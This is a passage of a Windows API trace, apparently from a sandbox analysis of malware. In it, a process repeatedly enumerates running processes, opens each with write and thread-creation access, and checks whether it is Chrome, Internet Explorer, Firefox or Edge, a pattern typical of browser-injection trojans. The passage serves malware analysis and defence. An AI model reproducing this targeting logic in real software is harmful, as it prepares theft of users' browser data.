	[0242.751] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0242.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8a7c
	[0242.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.753] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.753] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.753] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.754] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0242.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8a80
	[0242.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.755] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0242.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.755] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.755] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0242.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.756] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8a84
	[0242.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.757] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.757] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.758] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.758] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.758] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8a88
	[0242.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.760] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.800] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.800] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.801] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8a8c
	[0242.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.803] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8a90
	[0242.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.805] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.805] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.805] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8a94
	[0242.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.806] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.807] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.807] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.807] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8a98
	[0242.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.808] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.809] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.809] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.810] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0242.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8a9c
	[0242.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.811] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0242.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.811] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.811] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0242.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.811] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.812] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0242.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8aa0
	[0242.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.813] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.813] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.813] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.814] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.814] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0242.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8aa4
	[0242.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.836] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0242.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.836] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.836] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0242.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.837] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8aa8
	[0242.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.838] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.838] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.838] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.839] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0242.840] CloseHandle (hObject=0x4fd0) returned 1
	[0242.840] Sleep (dwMilliseconds=0x64) 
	[0242.941] GetCurrentProcessId () returned 0x110
	[0242.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0242.944] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0242.945] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0242.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0242.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8aac
	[0242.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.947] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.948] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.948] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.949] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8ab0
	[0242.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.950] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.951] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.951] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.952] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.952] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0242.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8ab4
	[0242.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.953] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0242.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.954] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.954] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0242.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.955] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8ab8
	[0242.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.957] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.958] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.958] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.959] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0242.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8abc
	[0242.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.960] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0242.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.961] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.961] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0242.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.962] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0242.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8ac0
	[0242.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.963] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0242.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.964] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.964] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0242.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.965] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0242.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8ac4
	[0242.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.966] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0242.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.967] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.967] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0242.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.967] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0242.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8ac8
	[0242.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.969] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.969] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.970] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.970] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8acc
	[0242.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.973] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.973] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.974] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.974] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.976] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8ad0
	[0242.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.976] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.976] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.977] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.977] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.978] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8ad4
	[0242.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.979] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.979] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.980] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.980] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.980] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8ad8
	[0242.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.982] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
